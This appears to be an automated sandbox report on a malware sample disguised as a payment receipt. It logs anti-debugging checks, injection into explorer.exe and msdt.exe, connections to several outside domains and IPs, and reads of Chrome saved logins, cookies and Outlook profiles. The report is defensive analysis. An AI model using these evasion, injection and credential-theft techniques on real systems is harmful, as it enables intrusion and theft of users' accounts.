Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A816E0 mov ecx, dword ptr fs:[00000030h]		3_2_00A816E0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B28ED6 mov eax, dword ptr fs:[00000030h]		3_2_00B28ED6
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A836CC mov eax, dword ptr fs:[00000030h]		3_2_00A836CC
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A98EC7 mov eax, dword ptr fs:[00000030h]		3_2_00A98EC7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B0FEC0 mov eax, dword ptr fs:[00000030h]		3_2_00B0FEC0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5E620 mov eax, dword ptr fs:[00000030h]		3_2_00A5E620
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B0FE3F mov eax, dword ptr fs:[00000030h]		3_2_00B0FE3F
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5C600 mov eax, dword ptr fs:[00000030h]		3_2_00A5C600
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5C600 mov eax, dword ptr fs:[00000030h]		3_2_00A5C600
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5C600 mov eax, dword ptr fs:[00000030h]		3_2_00A5C600
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A88E00 mov eax, dword ptr fs:[00000030h]		3_2_00A88E00
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8A61C mov eax, dword ptr fs:[00000030h]		3_2_00A8A61C
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8A61C mov eax, dword ptr fs:[00000030h]		3_2_00A8A61C
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11608 mov eax, dword ptr fs:[00000030h]		3_2_00B11608
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6766D mov eax, dword ptr fs:[00000030h]		3_2_00A6766D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]		3_2_00A7AE73
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]		3_2_00A7AE73
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]		3_2_00A7AE73
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]		3_2_00A7AE73
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]		3_2_00A7AE73
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]		3_2_00A67E41
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]		3_2_00A67E41
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]		3_2_00A67E41
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]		3_2_00A67E41
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]		3_2_00A67E41
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]		3_2_00A67E41
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1AE44 mov eax, dword ptr fs:[00000030h]		3_2_00B1AE44
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1AE44 mov eax, dword ptr fs:[00000030h]		3_2_00B1AE44
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A68794 mov eax, dword ptr fs:[00000030h]		3_2_00A68794
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD7794 mov eax, dword ptr fs:[00000030h]		3_2_00AD7794
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD7794 mov eax, dword ptr fs:[00000030h]		3_2_00AD7794
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD7794 mov eax, dword ptr fs:[00000030h]		3_2_00AD7794
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A937F5 mov eax, dword ptr fs:[00000030h]		3_2_00A937F5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A54F2E mov eax, dword ptr fs:[00000030h]		3_2_00A54F2E
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A54F2E mov eax, dword ptr fs:[00000030h]		3_2_00A54F2E
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8E730 mov eax, dword ptr fs:[00000030h]		3_2_00A8E730
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7B73D mov eax, dword ptr fs:[00000030h]		3_2_00A7B73D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7B73D mov eax, dword ptr fs:[00000030h]		3_2_00A7B73D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8A70E mov eax, dword ptr fs:[00000030h]		3_2_00A8A70E
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8A70E mov eax, dword ptr fs:[00000030h]		3_2_00A8A70E
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7F716 mov eax, dword ptr fs:[00000030h]		3_2_00A7F716
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AEFF10 mov eax, dword ptr fs:[00000030h]		3_2_00AEFF10
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AEFF10 mov eax, dword ptr fs:[00000030h]		3_2_00AEFF10
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B2070D mov eax, dword ptr fs:[00000030h]		3_2_00B2070D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B2070D mov eax, dword ptr fs:[00000030h]		3_2_00B2070D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6FF60 mov eax, dword ptr fs:[00000030h]		3_2_00A6FF60
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B28F6A mov eax, dword ptr fs:[00000030h]		3_2_00B28F6A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6EF40 mov eax, dword ptr fs:[00000030h]		3_2_00A6EF40

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Code function: 3_2_0040C327 LdrLoadDll,

3_2_0040C327

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_0040AA91 SetUnhandledExceptionFilter,		1_2_0040AA91
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_0040AD6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		1_2_0040AD6C
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_0040A932 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_0040A932
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_0040F6B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_0040F6B0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe	Domain query: www.bem4u.shop
Source: C:\Windows\explorer.exe	Domain query: www.030332.com
Source: C:\Windows\explorer.exe	Domain query: www.vnsuda.lol
Source: C:\Windows\explorer.exe	Domain query: www.stephapproved.com
Source: C:\Windows\explorer.exe	Network Connect: 75.2.115.196 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 70.32.23.81 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.110.163.134 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.coolfashionshop.xyz
Source: C:\Windows\explorer.exe	Network Connect: 103.100.208.243 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 2.57.90.16 80			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: AF0000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\fcvvthv.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Thread register set: target process: 3320			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Thread register set: target process: 3320			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q

Jump to behavior

Source: explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.261001669.0000000000B10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.310535687.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.300903726.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.261001669.0000000000B10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Code function: 1_2_0040ABAB cpuid

1_2_0040ABAB

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Code function: 1_2_0040A81B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_0040A81B

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe

Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_0040324F

Stealing of Sensitive Information

Source: Yara match	File source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\msdt.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior

Remote Access Functionality

Source: Yara match	File source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY